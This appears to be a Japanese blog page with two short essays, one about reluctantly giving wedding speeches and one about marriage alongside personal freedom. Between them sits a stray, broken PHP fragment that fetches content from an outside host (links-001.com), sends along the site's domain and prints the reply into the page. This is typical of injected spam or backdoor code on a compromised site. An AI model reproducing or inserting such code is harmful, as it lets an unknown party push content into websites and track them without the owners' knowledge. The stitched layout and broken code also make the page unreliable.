結婚式でのスピーチをよく頼まれる

結婚式と言うおめでたい席に呼ばれるのはとても名誉なことなので招待された場合には必ずと言ってよいほど出席することにしていますが、スピーチをしなければならない時は少し躊躇してしまいます。
私は結婚式に出席すること自体は好きなのですが人前で話すのは苦手なのでスピーチを頼まれると気が滅入ってしまうのですが、新郎新婦からどうしてもと頼まれると断ることができないので今までに10回ほど結婚式でスピーチをしたことがあります。
もちろんスピーチの内容は式によって違うので毎回どのような話をしようか考えこんでしまうのですが、どうしても話す内容が思い浮かばないためにかなりの時間を費やしてしまうこともあります。
ただこのようなお目出たい場では少々おかしなことを言っても出席者は笑って済ませてくれるので、話す内容に関してはあまり考え込まないようにしています。
また無事にスピーチを終えた後に出席者から盛大な拍手をしてもらえるので、そういったこともあって結婚式でのスピーチを頼まれた場合には断らないようにしています。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

結婚という言葉を考えることをしてみませんか

好きな人がいて、結婚をするは自然な流れでもあります。
ただ、全てが結婚が幸せであり人としての当たり前の人生ではありません。
ですが、もし、機会があるのであれば結婚を考えてみても良いではないでしょうか。
結婚はすべてに置いての終着点ではありません。
家事の事や家庭の事にすべてに置いて家族のことを考えなければならないというのも今の時代の流行りではありません。
家庭をもちながらも、家族を大事にして自分の事も大事にするのが今多くの方がしていることです。
趣味もきちんとしますし、仕事もします。
家事は役割分担をして、自分の時間を持てるようにしています。
結婚がすべて家庭という言葉に囚われることなく、ある程度自由をもつ主婦も多くいます。
また、サラリーマンも家族の為に働くというだけでなく、しっかりと趣味をもちながら家庭を大事にしています。
人との調和を課程や外でも上手にこなすことができています。
家の中に納まるだけが結婚ではないと認識をしてください。

最新記事